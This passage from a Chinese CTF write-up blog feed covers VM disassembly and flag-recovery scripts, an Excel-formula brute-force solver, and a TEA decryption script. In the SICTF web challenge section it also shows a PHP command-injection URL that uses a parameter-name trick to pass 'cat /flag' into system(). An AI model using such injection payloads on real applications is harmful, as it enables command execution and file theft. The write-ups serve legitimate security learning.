<span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x32</span>,<span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>,<span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x64</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x03</span>,<span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>,<span class="hljs-number">0x00</span>, <span class="hljs-number">0x08</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x04</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>,<span class="hljs-number">0x03</span>, <span class="hljs-number">0x05</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>,<span class="hljs-number">0x00</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>,<span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x28</span>,<span class="hljs-number">0x04</span>, <span class="hljs-number">0x06</span>, <span class="hljs-number">0x5F</span>, <span class="hljs-number">0x05</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>,<span class="hljs-number">0x01</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x96</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>,<span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x04</span>, <span class="hljs-number">0x07</span>, <span class="hljs-number">0x88</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x01</span>,<span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>,<span class="hljs-number">0x01</span>, <span class="hljs-number">0x28</span>, <span class="hljs-number">0x04</span>, <span class="hljs-number">0x07</span>, <span class="hljs-number">0x63</span>, <span class="hljs-number">0xFF</span>, <span class="hljs-number">0xFF</span>]<br>input1 = []<br>i = <span class="hljs-number">0</span><br><span class="hljs-keyword">while</span> opcode[i] != <span class="hljs-number">0xFF</span>:<br> <span class="hljs-keyword">match</span> opcode[i]:<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x00</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span>'</span>, end=<span class="hljs-string">' '</span>)<br> o = i + <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> opcode[o]:<br> <span class="hljs-keyword">match</span> opcode[o]:<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x01</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"mov input[reg[2]], reg[0]"</span>)<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x02</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"mov reg[%d], reg[%d]"</span> % (opcode[i+<span class="hljs-number">2</span>],opcode[i+<span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x03</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"mov reg[%d], %d"</span> % (opcode[i+<span class="hljs-number">2</span>], opcode[i+<span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"mov reg[0], input[reg[2]]"</span>)<br> i += <span class="hljs-number">4</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x01</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span>'</span>, end=<span class="hljs-string">' '</span>)<br> o = i + <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> opcode[o]:<br> <span class="hljs-keyword">match</span> opcode[o]:<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x01</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"push reg[0]"</span>)<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x02</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"push reg[2]"</span>)<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x03</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"push reg[3]"</span>)<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"push reg[0]"</span>)<br> i += <span class="hljs-number">2</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x02</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span>'</span>, end=<span class="hljs-string">' '</span>)<br> o = i + <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> opcode[o]:<br> <span class="hljs-keyword">match</span> opcode[o]:<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x01</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"pop reg[1]"</span>)<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x02</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"pop reg[2]"</span>)<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x03</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"pop reg[3]"</span>)<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"pop reg[0]"</span>)<br> i += <span class="hljs-number">2</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x03</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span>'</span>, end=<span class="hljs-string">' '</span>)<br> o = i + <span class="hljs-number">1</span><br> <span class="hljs-keyword">match</span> opcode[o]:<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"add reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">1</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"sup reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">2</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"mul reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">3</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"xor reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">4</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"shl reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">5</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"shr reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> i += <span class="hljs-number">4</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x04</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span> cmp reg[0], reg[1]'</span>)<br> i += <span class="hljs-number">1</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x05</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span> jmp %d '</span> % (opcode[i+<span class="hljs-number">1</span>]))<br> i += <span class="hljs-number">2</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x06</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span> je %d '</span> % (opcode[i+<span class="hljs-number">1</span>]))<br> i += <span class="hljs-number">2</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x07</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span> jne %d '</span> % (opcode[i+<span class="hljs-number">1</span>]))<br> i += <span class="hljs-number">2</span><br></code></pre></td></tr></table></figure></li><li>输出和分析<br>0 mov reg[2], 0<br>4 add reg[2],reg[3]<br>8 mov reg[0], input[reg[2]]<br>12 mov reg[1], reg[0]<br>//前四局 用于数据的初始化<br>16 mov reg[2], 50<br>20 add reg[2],reg[3]<br>24 mov reg[0], input[reg[2]]<br>28 add reg[1],reg[0]<br>//以50为分界线,将新的数据与原来的reg[1]相加相当于数组之间全部加一遍<br>32 mov reg[2], 100<br>36 add reg[2],reg[3]<br>40 mov reg[0], input[reg[2]]<br>44 xor reg[1],reg[0]<br>//以100为分界线,将新的数据与原来的reg[1]进行异或<br>48 mov reg[0], 8<br>52 mov reg[2], reg[1]<br>56 shl reg[1],reg[0]<br>60 shr reg[2],reg[0]<br>64 add reg[1],reg[2]<br>68 mov reg[0], reg[1]<br>72 push reg[0]<br>//这一步是将reg[0]置为8,然后进行左移右移操作,最后将结果加到reg[1]上,并将结果压入栈中<br>74 mov reg[0], 1<br>78 add reg[3],reg[0]<br>82 mov reg[0], reg[3]<br>86 mov reg[1], 40<br>90 cmp reg[0], reg[1]<br>91 je 95<br>93 jmp 0<br>95 mov reg[3], 0<br>//这个代表的是将上面的过程重复40次<br>99 pop reg[1]<br>101 mov reg[2], 150<br>105 add reg[2],reg[3]<br>109 mov reg[0], input[reg[2]]<br>113 cmp reg[0], reg[1]<br>114 jne 136<br>//这个是将栈中的数据与150号位置的数据进行比较,如果相同则跳转到136,否则跳转到0<br>116 mov reg[0], 1<br>120 add reg[3],reg[0]<br>124 mov reg[0], reg[3]<br>128 mov reg[1], 40<br>132 cmp reg[0], reg[1]<br>133 jne 99<br>//循环四十次回到99,好像是干扰项</li></ul><p>函数就是这个</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python">flag = [] <br>a1 = [] <br>a2 = [] <br>a3 = [] <br>k = a1 + flag <br>k2 = a2 ^ k <br>a3 = k2 << <span class="hljs-number">8</span> + k2 >> <span class="hljs-number">8</span><br><span class="hljs-comment">#nixiang</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">40</span>):<br> k2=((a3[i])>><span class="hljs-number">8</span>)&<span class="hljs-number">0xff</span>+((a3[i])<<<span class="hljs-number">8</span>)&<span class="hljs-number">0xff</span><br> k=k2^a2<br> flag=k-a1<br></code></pre></td></tr></table></figure><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs py">a1 = [<span class="hljs-number">155</span>, <span class="hljs-number">168</span>, <span class="hljs-number">2</span>, <span class="hljs-number">188</span>, <span class="hljs-number">172</span>, <span class="hljs-number">156</span>, <span class="hljs-number">206</span>, <span class="hljs-number">250</span>, <span class="hljs-number">2</span>, <span class="hljs-number">185</span>, <span class="hljs-number">255</span>, <span class="hljs-number">58</span>, <span class="hljs-number">116</span>, <span class="hljs-number">72</span>, <span class="hljs-number">25</span>, <span class="hljs-number">105</span>, <span class="hljs-number">232</span>, <span class="hljs-number">3</span>, <span class="hljs-number">203</span>, <span class="hljs-number">201</span>,<br> <span class="hljs-number">255</span>, <span class="hljs-number">252</span>, <span class="hljs-number">128</span>, <span class="hljs-number">214</span>, <span class="hljs-number">141</span>, <span class="hljs-number">215</span>, <span class="hljs-number">114</span>, <span class="hljs-number">0</span>, <span class="hljs-number">167</span>, <span class="hljs-number">29</span>, <span class="hljs-number">61</span>, <span class="hljs-number">153</span>, <span class="hljs-number">136</span>, <span class="hljs-number">153</span>, <span class="hljs-number">191</span>, <span class="hljs-number">232</span>, <span class="hljs-number">150</span>, <span class="hljs-number">46</span>, <span class="hljs-number">93</span>, <span class="hljs-number">87</span>]<br>a2 = [<span class="hljs-number">201</span>, <span class="hljs-number">169</span>, <span class="hljs-number">189</span>, <span class="hljs-number">139</span>, <span class="hljs-number">23</span>, <span class="hljs-number">194</span>, <span class="hljs-number">110</span>, <span class="hljs-number">248</span>, <span class="hljs-number">245</span>, <span class="hljs-number">110</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span>, <span class="hljs-number">213</span>, <span class="hljs-number">70</span>, <span class="hljs-number">93</span>, <span class="hljs-number">22</span>, <span class="hljs-number">152</span>, <span class="hljs-number">56</span>, <span class="hljs-number">48</span>, <span class="hljs-number">115</span>, <span class="hljs-number">56</span>,<br> <span class="hljs-number">193</span>, <span class="hljs-number">94</span>, <span class="hljs-number">237</span>, <span class="hljs-number">176</span>, <span class="hljs-number">41</span>, <span class="hljs-number">90</span>, <span class="hljs-number">24</span>, <span class="hljs-number">64</span>, <span class="hljs-number">167</span>, <span class="hljs-number">253</span>, <span class="hljs-number">10</span>, <span class="hljs-number">30</span>, <span class="hljs-number">120</span>, <span class="hljs-number">139</span>, <span class="hljs-number">98</span>, <span class="hljs-number">219</span>, <span class="hljs-number">15</span>, <span class="hljs-number">143</span>, <span class="hljs-number">156</span>]<br>a3 = [<span class="hljs-number">18432</span>, <span class="hljs-number">61696</span>, <span class="hljs-number">16384</span>, <span class="hljs-number">8448</span>, <span class="hljs-number">13569</span>, <span class="hljs-number">25600</span>, <span class="hljs-number">30721</span>, <span class="hljs-number">63744</span>, <span class="hljs-number">6145</span>, <span class="hljs-number">20992</span>, <span class="hljs-number">9472</span>, <span class="hljs-number">23809</span>, <span class="hljs-number">18176</span>, <span class="hljs-number">64768</span>, <span class="hljs-number">26881</span>, <span class="hljs-number">23552</span>,<br> <span class="hljs-number">44801</span>, <span class="hljs-number">45568</span>, <span class="hljs-number">60417</span>,<br> <span class="hljs-number">20993</span>, <span class="hljs-number">20225</span>, <span class="hljs-number">6657</span>, <span class="hljs-number">20480</span>, <span class="hljs-number">34049</span>, <span class="hljs-number">52480</span>, <span class="hljs-number">8960</span>, <span class="hljs-number">63488</span>, <span class="hljs-number">3072</span>, <span class="hljs-number">52992</span>, <span class="hljs-number">15617</span>, <span class="hljs-number">17665</span>, <span class="hljs-number">33280</span>, <span class="hljs-number">53761</span>, <span class="hljs-number">10497</span>, <span class="hljs-number">54529</span>, <span class="hljs-number">1537</span>,<br> <span class="hljs-number">41473</span>, <span class="hljs-number">56832</span>, <span class="hljs-number">42497</span>, <span class="hljs-number">51713</span>]<br>a4 = a3[::-<span class="hljs-number">1</span>]<br><span class="hljs-comment"># a4 = [51713, 42497, 56832, 41473, 1537, 54529, 10497, 53761, 33280, 17665, 15617, 52992, 3072, 63488, 8960, 52480, 34049, 20480, 6657, 20225, 20993, 60417, 45568, 44801, 23552, 26881, 64768, 18176, 23809, 9472, 20992, 6145, 63744, 30721, 25600, 13569, 8448, 16384, 61696, 18432]</span><br>flag = [<span class="hljs-number">0</span>] * <span class="hljs-number">40</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">40</span>):<br> flag[i] = ((a4[i] >> <span class="hljs-number">8</span>) & <span class="hljs-number">0xff</span> + (a4[i] << <span class="hljs-number">8</span>))<br> flag[i] ^= a2[i]<br> flag[i] -= a1[i]<br><span class="hljs-built_in">print</span>(<span class="hljs-string">""</span>.join([<span class="hljs-built_in">chr</span>(a&<span class="hljs-number">0xff</span>) <span class="hljs-keyword">for</span> a <span class="hljs-keyword">in</span> flag]))<br><br><span class="hljs-comment"># hgame{y0ur_rever5e_sk1ll_i5_very_g0od!!}</span><br></code></pre></td></tr></table></figure><h2 id="强网杯-2024-easy-vm"><a href="#强网杯-2024-easy-vm" class="headerlink" title="[强网杯 2024 easy_vm]"></a>[强网杯 2024 easy_vm]</h2><p>接触完了去年的我们来看看强网杯的vm吧</p><ul><li>查壳<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021111059.png" srcset="/img/loading.gif" lazyload></li><li>ida分析<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021116697.png" srcset="/img/loading.gif" lazyload><br>这次的区块有点大,我们逐段来分析一下</li></ul>]]></content>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>sicctfwp</title>
<link href="/2024/11/01/sicctfwp/"/>
<url>/2024/11/01/sicctfwp/</url>
<content type="html"><![CDATA[<h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="Sigin"><a href="#Sigin" class="headerlink" title="Sigin"></a>Sigin</h2><p>打开网页后出现这个页面<br><img src="https://gitee.com/fogpost/photo/raw/master/202411012216221.png" srcset="/img/loading.gif" lazyload><br>典型的robots协议,访问robots.txt<br>按照提示进入,发现一下界面<br><img src="https://gitee.com/fogpost/photo/raw/master/202411012217411.png" srcset="/img/loading.gif" lazyload><br>在本地弄一个php环境跑一下出了这个</p><blockquote><p>system(get_deined_vars()[_GET)][W3lc0me_t0_SICTF.2024]) </p></blockquote><p>简单来说就是将W3lc0me_t0_SICTF.2024作为system的get参数,多亏了有蒋✌教,这里存在一个php特性就是不能过多的下划线要改为W3lc0me_t0[SICTF.2024这个才行</p><blockquote><p><a href="http://27.25.151.29:33218/wh3re_1s_thi5_fl4g.php?W3lc0me_t0%5BSICTF.2024=cat">http://27.25.151.29:33218/wh3re_1s_thi5_fl4g.php?W3lc0me_t0[SICTF.2024=cat</a> /flag<br>SICTF{e79dbf83-bce6-4545-a9d7-53c527f3f13c} </p></blockquote><h1 id="reverse"><a href="#reverse" class="headerlink" title="reverse"></a>reverse</h1><h2 id="Exc"><a href="#Exc" class="headerlink" title="Exc??"></a>Exc??</h2><p>感觉和之前moectf的一个很像,直接打开看看<br>将这个xlsx分为一下几个模块</p><ul><li>输入输出模块<br><img src="https://gitee.com/fogpost/photo/raw/master/202411012230759.png" srcset="/img/loading.gif" lazyload></li><li>算法模块<br><img src="https://gitee.com/fogpost/photo/raw/master/202411012231237.png" srcset="/img/loading.gif" lazyload><br>先看wrong格中的内容</li></ul><blockquote><p>IF(C3=D19,IF(F3=G19,IF(I3=J19,IF(L3=D21,IF(O3=G21,IF(R3=J21,IF(U3=D23,IF(X3=G23,IF(AA3=J23,</p></blockquote><blockquote><p>IF(D13=Q19,IF(G13=T19,IF(J13=W19,IF(D15=Q21,IF(G15=T21,IF(J15=W21,IF(D17=Q23,IF(G17=T23,IF(J17=W23,</p></blockquote><blockquote><p>IF(D31=AT10,IF(G31=AW10,IF(J31=AZ10,IF(M31=AT12,IF(P31=AW12,IF(S31=AZ12,IF(V31=AT14,IF(Y31=AW14,IF(AB31=AZ14,”Accepted!”)))))))))))))))))))))))))))</p></blockquote><p> 发现存在一个accpted,去找这个实现条件,发现是输入输出模块中的数要与算法模块中的紫色数据块相同<br>继续找紫色output的实现函数</p><p>分别如下<br>=BITLSHIFT(CODE(C2),3)+BITLSHIFT(CODE(D2),4)+BITLSHIFT(CODE(E2),5)<br>第二个是<br>=CODE(C2)*3+CODE(D2)*4+CODE(E2)*5<br>第三个是<br>=CODE(C2)*CODE(D2)+CODE(D2)*CODE(E2)+CODE(E2)*CODE(C2)</p><p>解释一下几个函数<br>BITLSHIFT(number, shift_amount):执行左移操作<br>CODE(text):将文本转换为ASCII码</p><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs py">enc = [<span class="hljs-number">3976</span>, <span class="hljs-number">5728</span>, <span class="hljs-number">5640</span>, <span class="hljs-number">4232</span>, <span class="hljs-number">5272</span>, <span class="hljs-number">3776</span>, <span class="hljs-number">6464</span>, <span class="hljs-number">6136</span>, <span class="hljs-number">5408</span>]<br>enc1 = [<span class="hljs-number">876</span>, <span class="hljs-number">1147</span>, <span class="hljs-number">1182</span>, <span class="hljs-number">824</span>, <span class="hljs-number">1082</span>, <span class="hljs-number">866</span>, <span class="hljs-number">1361</span>, <span class="hljs-number">1278</span>, <span class="hljs-number">1087</span>]<br>enc2 = [<span class="hljs-number">16511</span>, <span class="hljs-number">24822</span>, <span class="hljs-number">26991</span>, <span class="hljs-number">11999</span>, <span class="hljs-number">21215</span>, <span class="hljs-number">16374</span>, <span class="hljs-number">37800</span>, <span class="hljs-number">32739</span>, <span class="hljs-number">21505</span>]<br><br><span class="hljs-keyword">for</span> l <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-number">9</span>):<br> found = <span class="hljs-literal">False</span> <span class="hljs-comment"># 初始化找到标志</span><br> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">32</span>, <span class="hljs-number">127</span>):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">32</span>, <span class="hljs-number">127</span>):<br> <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">32</span>, <span class="hljs-number">127</span>):<br> <span class="hljs-comment"># 使用 and 代替 &</span><br> <span class="hljs-keyword">if</span> (i * <span class="hljs-number">8</span> + j * <span class="hljs-number">16</span> + k * <span class="hljs-number">32</span> == enc[l] <span class="hljs-keyword">and</span> <br> i * <span class="hljs-number">3</span> + j * <span class="hljs-number">4</span> + k * <span class="hljs-number">5</span> == enc1[l] <span class="hljs-keyword">and</span> <br> i * j + j * k + k * i == enc2[l]):<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f"<span class="hljs-subst">{<span class="hljs-built_in">chr</span>(i)}</span><span class="hljs-subst">{<span class="hljs-built_in">chr</span>(j)}</span><span class="hljs-subst">{<span class="hljs-built_in">chr</span>(k)}</span>"</span>,end=<span class="hljs-string">""</span>)<br> found = <span class="hljs-literal">True</span> <span class="hljs-comment"># 设置找到标志</span><br> <span class="hljs-keyword">break</span> <span class="hljs-comment"># 跳出内层循环</span><br> <span class="hljs-keyword">if</span> found: <span class="hljs-comment"># 如果找到匹配,则跳出中间循环</span><br> <span class="hljs-keyword">break</span><br> <span class="hljs-keyword">if</span> found: <span class="hljs-comment"># 如果找到匹配,则跳出外层循环</span><br> <span class="hljs-keyword">break</span><br><br></code></pre></td></tr></table></figure><p>SICTF{Exc31_1s_r3@lly_fun!}</p>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>nssctf2024秋季回顾</title>
<link href="/2024/10/31/nssctf2024%E7%A7%8B%E5%AD%A3%E5%9B%9E%E9%A1%BE/"/>
<url>/2024/10/31/nssctf2024%E7%A7%8B%E5%AD%A3%E5%9B%9E%E9%A1%BE/</url>
<content type="html"><![CDATA[<h1 id="nssctf2024秋季回顾"><a href="#nssctf2024秋季回顾" class="headerlink" title="nssctf2024秋季回顾"></a>nssctf2024秋季回顾</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这个比赛也算是打的比较舒服的一个比赛,不过后期有点懈怠了,有许多题都没有看主要是没有什么想法吧,回顾主要是把不会的和想学习的写一下,已经出来的就不打算再写了</p><h2 id="reverse"><a href="#reverse" class="headerlink" title="reverse"></a>reverse</h2><h3 id="NSS茶馆"><a href="#NSS茶馆" class="headerlink" title="NSS茶馆"></a>NSS茶馆</h3><p>这个题没想到是tea,最近接触少了,敏感度骤然下降,还是要好好把握一下</p><ul><li>先是查壳<br><img src="https://gitee.com/fogpost/photo/raw/master/202410312022329.png" srcset="/img/loading.gif" lazyload></li><li>老样子32位启动<br><img src="https://gitee.com/fogpost/photo/raw/master/202410312040919.png" srcset="/img/loading.gif" lazyload><br>在这个图中的sub_411118便是我们的解密函数,判断函数<br><img src="https://gitee.com/fogpost/photo/raw/master/202410312046855.png" srcset="/img/loading.gif" lazyload><br>tea本体<br><img src="https://gitee.com/fogpost/photo/raw/master/202410312047549.png" srcset="/img/loading.gif" lazyload><br>解题脚本<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><bits/stdc++.h></span></span><br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">decrypt</span><span class="hljs-params">(<span class="hljs-type">uint32_t</span>* v,<span class="hljs-type">uint32_t</span> * k)</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-type">uint32_t</span> v0=v[<span class="hljs-number">0</span>],v1=v[<span class="hljs-number">1</span>],sum=<span class="hljs-number">1131796</span>*<span class="hljs-number">33</span>, i;<br> <span class="hljs-type">uint32_t</span> delta=<span class="hljs-number">1131796</span>;<br> <span class="hljs-type">uint32_t</span> k0=k[<span class="hljs-number">0</span>],k1=k[<span class="hljs-number">1</span>],k2=k[<span class="hljs-number">2</span>],k3=k[<span class="hljs-number">3</span>];<br> <span class="hljs-keyword">for</span> (i=<span class="hljs-number">0</span>; i<<span class="hljs-number">33</span>; i++){<br> v1-=((v0<<<span class="hljs-number">4</span>)+k2)^(v0+sum)^((v0>><span class="hljs-number">5</span>)+k3);<br> v0-=((v1<<<span class="hljs-number">4</span>)+k0)^(v1+sum)^((v1>><span class="hljs-number">5</span>)+k1);<br> sum -=delta;<br> }<br> v[<span class="hljs-number">0</span>]=v0;v[<span 